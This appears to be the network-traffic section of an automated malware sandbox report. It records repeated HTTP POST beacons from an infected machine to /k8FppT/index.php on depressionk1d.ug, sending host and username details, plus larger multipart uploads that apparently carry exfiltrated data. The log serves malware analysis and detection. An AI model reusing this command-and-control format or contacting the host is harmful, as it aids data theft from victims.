              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----2379f4103dba772a786c03df93bf021fHost: depressionk1d.ugContent-Length: 111558Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----86276d229fb4ffc8fb814ec5a99a260fHost: depressionk1d.ugContent-Length: 106881Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----d156afa604c62121b8f472f457fa2c8fHost: depressionk1d.ugContent-Length: 106953Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
